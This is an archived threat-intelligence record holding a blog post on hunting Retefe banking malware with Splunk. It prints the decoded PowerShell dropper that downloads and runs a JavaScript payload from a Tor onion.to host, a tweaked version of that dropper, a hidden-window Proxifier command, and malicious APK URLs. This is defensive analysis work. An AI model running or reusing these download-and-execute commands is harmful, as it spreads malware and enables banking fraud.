{
	"id": "afd2696e-d7fa-4da4-b6ae-bc11a75bf90e",
	"created_at": "2026-04-06T00:17:25.662816Z",
	"updated_at": "2026-04-10T03:21:10.134462Z",
	"deleted_at": null,
	"sha1_hash": "175ed924530bca2746364f93071c0ff09061cb6e",
	"title": "Hunting Retefe with Splunk - some interesting points",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 678786,
	"plain_text": "Hunting Retefe with Splunk - some interesting points\r\nArchived: 2026-04-05 21:22:30 UTC\r\nWhile I was creating some Splunk use cases to detect malware (together with Sysmon) I was doing some test with malware\r\nRefete which I wrote quite a bit in this blog about it. \r\nThere are a couple of things I found interested to share\r\nThe initial vector of infection is through Malspam with a fake bill in a DOCX file which contains some malicious code.\r\nHowever, this time the malicious code is PowerShell, instead of JS (more info in\r\nhttp://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html)\r\nThis can be spotted straight forward in Splunk.\r\npowershell -EncodedCommand \"JABGAD0AJABlAG4AdgA6AFQAZQBtAHAAKwAnAFwAUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAJwA7ACgATg\r\nThe command decoded, which acts as a dropper, is the following:\r\n1\r\n2\r\n$F=$env:Temp+'\\RBXr1lk9P.js';\r\n(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.We\r\nBasically, it requests a file located in a Tor node (which is the payload) through the onion.to\r\nwebsite: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=\r\nhttp://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html\r\nPage 1 of 3\n\nTo request the file, it is necessary to send the IP of the victim as parameter and the logical number of the disk. To do so,\r\nthere are 2 things happening:\r\n1) request to http://api.ipify.org/ in order to get the public IP of the victim\r\n2) run the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) to extract the serial number of the logical\r\ndisk.\r\nIf the IP is not from some specific countries or the serial number is empty the payload downloaded is empty as well, hence\r\nnothing happens. Actually, in some cases the parameter \"2\", doesn't work, and needs to be different.  For, example this\r\ncommand will work in some VirtualMachines (just need to put an IP from Switzerland in the w.x.y.z)\r\n$F=$env:Temp+'\\RBXr1lk9P.js';(New-Object\r\nSystem.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z\u0026id='+((wmic path\r\nwin32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com\r\nShell.Application).ShellExecute($F)\r\nClearly, they are using the logical number for tracking purposes\r\nOnce the script is pulled the whole execution happens. Some JS code is executed, some additional tools are decompressed\r\nand execute (Tor and Proxifier), the browser processes are killed, etc.\r\nHowever, a couple of new 'features' have been introduced since my last posts:\r\nhttp://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html\r\nhttp://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html\r\nFirst of all is the way that the Proxifier tool is launched, as the window now is hidden. This is done with the PowerShell\r\ncommand:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$t='[DllImport(\\\"user32.dll\\\")] public static extern bool\r\nShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \\\"Proxifier\\\";while(!\r\n[n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\\\"proxifier\\\")|gps).MainWindowHandle,0)){}\"\r\nSecond, the Proxifier is configured to not be shown in the windows system Icon on the bottom left part of the desktop.\r\nhttp://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html\r\nPage 2 of 3\n\nAfter that, the victim's traffic towards the banks is redirect to Tor. In order to steal the TAN SMS token, it is necessary to\r\ninstall a malicious APK, however here there are some changes as well:\r\nNow the APK resides in a domain with a valid SSL certificate and the APK can be dowloaded by HTTPS. Before, this was\r\nnot the case and the traffic was only HTTP\r\nNote that the certificate has been registered a few days ago and the expiration date is 2 months\r\nMoreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal\r\nPrivate Messenger\" tool, hence the victim's phone doesn't get infected. Some examples of the URL for different banks:\r\nhttps://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk\r\nhttps://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk\r\nhttps://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk\r\nSource: http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html\r\nhttp://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html"
	],
	"report_names": [
		"hunting-retefe-with-splunk-some24.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434645,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.pdf",
		"text": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.txt",
		"img": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.jpg"
	}
}